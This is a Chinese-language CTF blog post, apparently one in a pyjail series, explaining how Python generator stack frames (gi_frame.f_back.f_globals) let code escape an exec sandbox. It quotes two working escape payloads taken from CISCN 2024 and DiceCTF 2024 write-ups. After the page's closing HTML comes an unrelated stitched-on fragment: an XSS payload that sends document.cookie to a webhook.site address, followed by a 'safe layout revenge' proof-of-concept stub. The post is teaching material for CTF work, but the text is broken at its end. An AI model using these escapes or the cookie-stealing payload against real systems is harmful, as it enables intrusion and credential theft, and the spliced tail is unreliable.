<p>每次调用一个普通函数时，Python 会为该函数创建一个新的栈帧，并将其压入调用栈中。当函数执行完毕后，栈帧会被弹出。生成器的实现也使用到了栈帧，但不同的是，生成器可以暂停执行，并在恢复时继续从暂停的位置执行，也就意味着生成器的栈帧行为有所区别。</p>

<p>下面是一个测试示例：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span>

<span class="k">def</span> <span class="nf">my_generator</span><span class="p">():</span>
    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Generator started, frame: </span><span class="si">{</span><span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">yield</span> <span class="mi">1</span>
    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">After first yield, frame: </span><span class="si">{</span><span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">yield</span> <span class="mi">2</span>
    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">After second yield, frame: </span><span class="si">{</span><span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">yield</span> <span class="mi">3</span>

<span class="n">gen</span> <span class="o">=</span> <span class="nf">my_generator</span><span class="p">()</span>

<span class="c1"># 第一次调用 next()，启动生成器
</span><span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 1
# 第二次调用 next()，继续执行
</span><span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 2
# 第三次调用 next()，继续执行
</span><span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 3
</span>
<span class="c1"># Generator started, frame: &lt;frame at 0x7fe3333b09e0, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_3.py', line 4, code my_generator&gt;
# 1
# After first yield, frame: &lt;frame at 0x7fe3333b09e0, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_3.py', line 6, code my_generator&gt;
# 2
# After second yield, frame: &lt;frame at 0x7fe3333b09e0, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_3.py', line 8, code my_generator&gt;
# 3
</span></pre></td></tr></tbody></table></code></div></div>
<p>每次调用 next() 时，生成器会从上次暂停的位置继续执行，并且它的栈帧保持不变。这表明，在整个生命周期中，生成器的栈帧一直存在，并且保存着它的状态。</p>

<p>我们可以使用 dir 函数来查看生成器的内容</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre></td><td class="rouge-code"><pre><span class="n">g</span> <span class="o">=</span> <span class="p">(</span><span class="mi">1</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">])</span>
<span class="nf">dir</span><span class="p">(</span><span class="n">g</span><span class="p">)</span>
<span class="c1"># ['__class__',
#  '__del__',
#  '__delattr__',
#  ... ,
#  'close',
#  'gi_code',
#  'gi_frame',
#  'gi_running',
#  'gi_suspended',
#  'gi_yieldfrom',
#  'send',
#  'throw']
</span><span class="n">g</span><span class="p">.</span><span class="n">gi_frame</span>  <span class="c1"># &lt;frame at 0x102bd4880, file '/code.py', line 1, code &lt;genexpr&gt;&gt;
</span></pre></td></tr></tbody></table></code></div></div>
<p>生成器对象自身也存在一些独有的属性，以 gi_开头:</p>
<ul>
  <li>gi_frame: gi_frame 就是生成器的栈帧，生成器每次执行，栈帧的地址保持不变。</li>
</ul>

<h3 id="生成器栈帧逃逸-payload"><span class="me-2">生成器栈帧逃逸 payload</span><a href="#生成器栈帧逃逸-payload" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>下面是博客 <a href="https://pid-blog.com/article/frame-escape-pyjail#%E7%94%9F%E6%88%90%E5%99%A8%E7%9A%84%E6%A0%88%E5%B8%A7">利用生成器栈帧逃逸 Pyjail | CISCN 2024 mossfern 题解</a> 给出的一段抽象逻辑：</p>

<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td><td class="rouge-code"><pre><span class="n">flag</span> <span class="o">=</span> <span class="sh">"</span><span class="s">flag{12345}</span><span class="sh">"</span>
<span class="n">code</span> <span class="o">=</span> <span class="sh">"""</span><span class="s">&lt;&lt;用户提供的 Python 代码&gt;&gt;</span><span class="sh">"""</span>
<span class="p">...</span> <span class="c1"># 对 code 进行严防死守的过滤
</span><span class="n">compiled_code</span> <span class="o">=</span> <span class="nf">compile</span><span class="p">(</span><span class="n">code</span><span class="p">)</span>
<span class="p">...</span> <span class="c1"># 又是一段严防死守的过滤
</span><span class="nf">exec</span><span class="p">(</span>
    <span class="n">compiled_code</span><span class="p">,</span>
    <span class="bp">None</span><span class="p">,</span>   <span class="c1"># globals，也可能是其他值
</span>    <span class="bp">None</span>    <span class="c1"># locals，也可能是其他值
</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div></div>

<p>用户的代码被丢进exec中执行。经过严格的过滤后，import、魔术方法、builtins 等沙箱逃逸的常用思路都会被堵死。这时候想要逃逸到 exec 环境之外拿到flag，甚至是 RCE，就需要通过栈帧回溯来实现。</p>

<h4 id="payload1"><span class="me-2">payload1</span><a href="#payload1" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>文章 <a href="https://pid-blog.com/article/frame-escape-pyjail#%E7%94%9F%E6%88%90%E5%99%A8%E7%9A%84%E6%A0%88%E5%B8%A7">利用生成器栈帧逃逸 Pyjail | CISCN 2024 mossfern 题解</a> 给出的 payload 如下：</p>

<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre><span class="n">q</span> <span class="o">=</span> <span class="p">(</span><span class="n">q</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_globals</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">1</span><span class="p">])</span>
<span class="n">g</span> <span class="o">=</span> <span class="p">[</span><span class="o">*</span><span class="n">q</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span>
<span class="c1"># g 现在是 exec 之外的栈帧的 globals 了
# g 是一个 dict，其中包含 flag 变量
</span></pre></td></tr></tbody></table></code></div></div>
<p>要理解上面的表达式，需要明白：</p>
<ol>
  <li>==生成器在初始化时并不会立即执行==。q 初始化之后并不会立即执行，而是到 [*q] 时才执行。因此乍一眼看有语法问题，q 并没有定义啊？但是当其执行时，q 已经是一个生成器对象了。</li>
  <li>f_back 属性用于访问调用栈中的前一个栈帧。</li>
</ol>

<p>因此：</p>
<ul>
  <li>q.gi_frame 是生成器对象 q 的当前栈帧。</li>
  <li>q.gi_frame.f_back 得到的是 exec 函数的栈帧，</li>
  <li>q.gi_frame.f_back.f_back 得到的就是全局栈帧了。</li>
  <li>q.gi_frame.f_back.f_back.f_globals 得到的就是 globals() 函数的内容。</li>
</ul>

<p>builtins 和 locals 也可以同理拿到。</p>

<p>作者提到为什么非得把 q.gi_frame 写在生成器里面？为什么不能写成下面这样：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre><span class="n">q</span> <span class="o">=</span> <span class="p">(</span><span class="mi">1</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">1</span><span class="p">])</span>
<span class="n">g</span> <span class="o">=</span> <span class="n">q</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_globals</span>
</pre></td></tr></tbody></table></code></div></div>

<p>原因在于只有在生成器运行过程中，q.gi_frame.f_back 才不为 None（CPython 中定义的逻辑）。即使 q 已经是一个生成器，但是由于并没有进行解包操作，生成器并没有运行，所以 q.gi_frame.f_back 始终为 None，如果没有解包的话，即使像上面那样写，结果也是 None。</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="n">q</span> <span class="o">=</span> <span class="p">(</span><span class="n">q</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_globals</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">1</span><span class="p">])</span>
<span class="n">g</span> <span class="o">=</span> <span class="n">q</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span>
<span class="c1"># None
</span></pre></td></tr></tbody></table></code></div></div>

<p>测试脚本：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td><td class="rouge-code"><pre><span class="n">flag</span> <span class="o">=</span> <span class="sh">"</span><span class="s">flag{12345}</span><span class="sh">"</span>
<span class="n">code</span> <span class="o">=</span> <span class="sh">"""</span><span class="s">q = (q.gi_frame.f_back.f_back.f_globals for _ in [1]);g = [*q][0];print(g)</span><span class="sh">"""</span>
<span class="c1"># 对 code 进行严防死守的过滤
</span><span class="n">compiled_code</span> <span class="o">=</span> <span class="nf">compile</span><span class="p">(</span><span class="n">code</span><span class="p">,</span><span class="sh">"</span><span class="s">&lt;sandbox&gt;</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">exec</span><span class="sh">"</span><span class="p">)</span>
<span class="c1"># 又是一段严防死守的过滤
</span><span class="nf">exec</span><span class="p">(</span>
    <span class="n">compiled_code</span><span class="p">,</span>
    <span class="bp">None</span><span class="p">,</span>   <span class="c1"># globals，也可能是其他值
</span>    <span class="bp">None</span>    <span class="c1"># locals，也可能是其他值
</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div></div>

<h4 id="payload2"><span class="me-2">payload2</span><a href="#payload2" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p><a href="https://maplebacon.org/2024/02/dicectf2024-irs/">[DiceCTF 2024] IRS</a> 这篇博客也给出了一个生成器栈帧的 payload：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre><span class="k">def</span> <span class="nf">f</span><span class="p">():</span>
    <span class="k">global</span> <span class="n">x</span><span class="p">,</span> <span class="n">frame</span>
    <span class="n">frame</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_back</span>
    <span class="k">yield</span>
<span class="n">x</span> <span class="o">=</span> <span class="nf">f</span><span class="p">()</span>
<span class="n">x</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="bp">None</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="n">frame</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div></div>
<p>如何理解这段代码：</p>
<ol>
  <li>首先声明了一个生成器 f，
    <ol>
      <li>f 内部声明了全局变量 x 和 frame，意味着会在函数外部对其进行操作。</li>
    </ol>
  </li>
  <li>x = f() 会实例化一个生成器，但由于生成器的延迟加载，此时生成器不会执行。</li>
  <li>x.send(None)：这行代码启动了生成器，并让它执行到第一个 yield 语句。</li>
</ol>

<p>ps: 文章作者这段 payload 与上面那种 payload 的区别再于没有显示定一个生成器，AST 中不会出现 ast.GeneratorExp。</p>

<p>测试代码如下：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
</pre></td><td class="rouge-code"><pre><span class="n">flag</span> <span class="o">=</span> <span class="sh">"</span><span class="s">flag{12345}</span><span class="sh">"</span>
<span class="n">code</span> <span class="o">=</span> <span class="sh">'''</span><span class="s">
def f():
    global x, frame
    frame = x.gi_frame.f_back.f_back
    yield
x = f()
x.send(None)
print(frame.f_globals)
</span><span class="sh">'''</span>

<span class="n">compiled_code</span> <span class="o">=</span> <span class="nf">compile</span><span class="p">(</span><span class="n">code</span><span class="p">,</span><span class="sh">"</span><span class="s">&lt;sandbox&gt;</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">exec</span><span class="sh">"</span><span class="p">)</span>
<span class="c1"># 又是一段严防死守的过滤
</span><span class="nf">exec</span><span class="p">(</span>
    <span class="n">compiled_code</span><span class="p">,</span>
    <span class="bp">None</span><span class="p">,</span>   <span class="c1"># globals，也可能是其他值
</span>    <span class="bp">None</span>    <span class="c1"># locals，也可能是其他值
</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div></div>

<h3 id="csicn-2024-mossfern"><span class="me-2">CSICN 2024 mossfern</span><a href="#csicn-2024-mossfern" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<h2 id="参考资料"><span class="me-2">参考资料</span><a href="#参考资料" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<ul>
  <li>
    <div class="table-wrapper"><table>
      <tbody>
        <tr>
          <td>[利用生成器栈帧逃逸 Pyjail</td>
          <td>CISCN 2024 mossfern 题解](https://pid-blog.com/article/frame-escape-pyjail#%E9%A2%98%E8%A7%A3%EF%BC%9Amossfern)</td>
        </tr>
      </tbody>
    </table></div>
  </li>
</ul>

  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/python/">Python</a>
      </div>
    
    <!-- tags -->
    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a
            href="/tags/pyjail/"
            class="post-tag no-text-decoration"
          >pyjail</a>
        
      </div>
    
    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
      <a href="https://twitter.com/intent/tweet?text=pyjail%20bypass-11%20%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88%E9%80%83%E9%80%B8%20-%20DummyKitty's%20Blog&url=%2Fposts%2Fpyjail-bypass-11-%25E5%2588%25A9%25E7%2594%25A8%25E7%2594%259F%25E6%2588%2590%25E5%2599%25A8%25E6%25A0%2588%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fa-brands fa-square-x-twitter"></i>
      </a>
    
      <a href="https://www.facebook.com/sharer/sharer.php?title=pyjail%20bypass-11%20%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88%E9%80%83%E9%80%B8%20-%20DummyKitty's%20Blog&u=%2Fposts%2Fpyjail-bypass-11-%25E5%2588%25A9%25E7%2594%25A8%25E7%2594%259F%25E6%2588%2590%25E5%2599%25A8%25E6%25A0%2588%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook">
        <i class="fa-fw fab fa-facebook-square"></i>
      </a>
    
      <a href="https://t.me/share/url?url=%2Fposts%2Fpyjail-bypass-11-%25E5%2588%25A9%25E7%2594%25A8%25E7%2594%259F%25E6%2588%2590%25E5%2599%25A8%25E6%25A0%2588%2F&text=pyjail%20bypass-11%20%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88%E9%80%83%E9%80%B8%20-%20DummyKitty's%20Blog" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram">
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    
    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copy link"
      data-title-succeed="Link copied successfully!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>

          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->

  <section id="access-lastmod">
    <h2 class="panel-heading">Recently Updated</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        <li class="text-truncate lh-lg">
          <a href="/posts/phpggc-thinkphp-%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90/">phpggc thinkphp 利用链分析</a>
        </li>
      
        <li class="text-truncate lh-lg">
          <a href="/posts/php-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%A9%E7%94%A8/">php 反序列化利用</a>
        </li>
      
        <li class="text-truncate lh-lg">
          <a href="/posts/php-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%A0%BC%E5%BC%8F%E5%9F%BA%E7%A1%80/">php 反序列化格式基础</a>
        </li>
      
        <li class="text-truncate lh-lg">
          <a href="/posts/php-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%BB%95%E8%BF%87/">php 反序列化绕过</a>
        </li>
      
        <li class="text-truncate lh-lg">
          <a href="/posts/php-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%97%E7%AC%A6%E9%80%83%E9%80%B8/">php 反序列化字符逃逸</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->

              <!-- The trending tags list -->

  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        <a class="post-tag btn btn-outline-primary" href="/tags/deserialization/">Deserialization</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/pyjail/">pyjail</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/thinkphp/">thinkphp</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/xss/">xss</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/debug/">debug</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/prototype-pollution/">prototype-pollution</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/rasp/">RASP</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/0ctf-2023/">0ctf 2023</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/docker/">docker</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/info-gathering/">Info gathering</a>
      
    </div>
  </section>

            </div>

  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-2 mb-0">Contents</h2>
    <nav id="toc"></nav>
  </section>

          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->

<!-- An random integer that bigger than 0 -->

<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->

  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">Further Reading</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/posts/QWB-2023-writeup/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1702981788"
  data-df="ll"
  
>
  Dec 19, 2023
</time>

              <h4 class="pt-0 my-2">QWB 2023 Writeup</h4>
              <div class="text-muted">
                <p>WEB
happygame
题目提供了一个 gRPC 服务。gRPC 是一个由 Google 初始开发的高性能、开源的远程过程调用（RPC）框架。网上已有不少针对 gRPC 的安全研究：

  【Black Hat Asia 2021系列分享】自动化挖掘 gRPC 网络接口漏洞
  gRPC内存马研究与查杀 - 先知社区

gRPC 框架如下所示：

可见服务端由 Java 编写。

针...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/pyjail-bypass-04-%E7%BB%95%E8%BF%87%E5%A4%9A%E8%A1%8C%E9%99%90%E5%88%B6/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1685442237"
  data-df="ll"
  
>
  May 30, 2023
</time>

              <h4 class="pt-0 my-2">pyjail bypass-04 绕过多行限制</h4>
              <div class="text-muted">
                <p>pyjail 沙箱逃逸原理
    绕过删除模块或方法
    绕过基于字符串匹配的过滤
    绕过命名空间限制
    绕过多行限制
    绕过长度限制
    变量覆盖与函数篡改
    绕过 audit hook
    绕过 AST 沙箱
    绕过输出限制
    绕过 opcode 沙箱
    利用生成器栈
  
绕过多行限制
绕过多行限制的利用手法通常在限制了单行代...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/pyjail-bypass-03-%E7%BB%95%E8%BF%87%E5%91%BD%E5%90%8D%E7%A9%BA%E9%97%B4%E9%99%90%E5%88%B6/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1685442237"
  data-df="ll"
  
>
  May 30, 2023
</time>

              <h4 class="pt-0 my-2">pyjail bypass-03 绕过命名空间限制</h4>
              <div class="text-muted">
                <p>pyjail 沙箱逃逸原理
    绕过删除模块或方法
    绕过基于字符串匹配的过滤
    绕过命名空间限制
    绕过多行限制
    绕过长度限制
    变量覆盖与函数篡改
    绕过 audit hook
    绕过 AST 沙箱
    绕过输出限制
    绕过 opcode 沙箱
    利用生成器栈
  
绕过命名空间限制

部分限制
有些沙箱在构建时使用 e...</p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->

              <!-- Navigation buttons at the bottom of the post. -->

<nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation">
  
    <a
      href="/posts/pyjail-bypass-10-%E7%BB%95%E8%BF%87-opcode-%E6%B2%99%E7%AE%B1/"
      class="btn btn-outline-primary"
      aria-label="Older"
    >
      <p>pyjail bypass-10 绕过 opcode 沙箱</p>
    </a>
  
    <a
      href="/posts/TPCTF-2025-web-writeup/"
      class="btn btn-outline-primary"
      aria-label="Newer"
    >
      <p>TPCTF 2025 Web Writeup</p>
    </a>
  
</nav>

            <!-- The Footer -->

<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>©
    <time>2025</time>

      <a href="https://twitter.com/DummyKitty">DummyKitty</a>.
    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author."
      >Some rights reserved.</span>
    
  </p>

  <p>Using the <a
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="v7.2.4"
        href="https://github.com/cotes2020/jekyll-theme-chirpy"
        target="_blank"
        rel="noopener"
      >Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->

  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        <a class="post-tag btn btn-outline-primary" href="/tags/deserialization/">Deserialization</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/pyjail/">pyjail</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/thinkphp/">thinkphp</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/xss/">xss</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/debug/">debug</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/prototype-pollution/">prototype-pollution</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/rasp/">RASP</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/0ctf-2023/">0ctf 2023</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/docker/">docker</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/info-gathering/">Info gathering</a>
      
    </div>
  </section>

    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">A new version of content is available.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Update
    </button>
  </div>
</aside>

    <!-- Embedded scripts -->

      <!-- The comments switcher -->

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->

<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{snippet}</p>  </article>',
      noResultsText: '<p class="mt-5">Oops! No results found.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>
img src=x onerror=fetch('https://webhook.site/f57e3466-a8a4-4a5c-968a-551c1543af38?flag='+document.cookie)></style>"}

{"content":"","layoutId":5}

safe layout revenge

Poc

  
{"layout":"x<style><<!doctype html>

<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" data-mode="light">
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
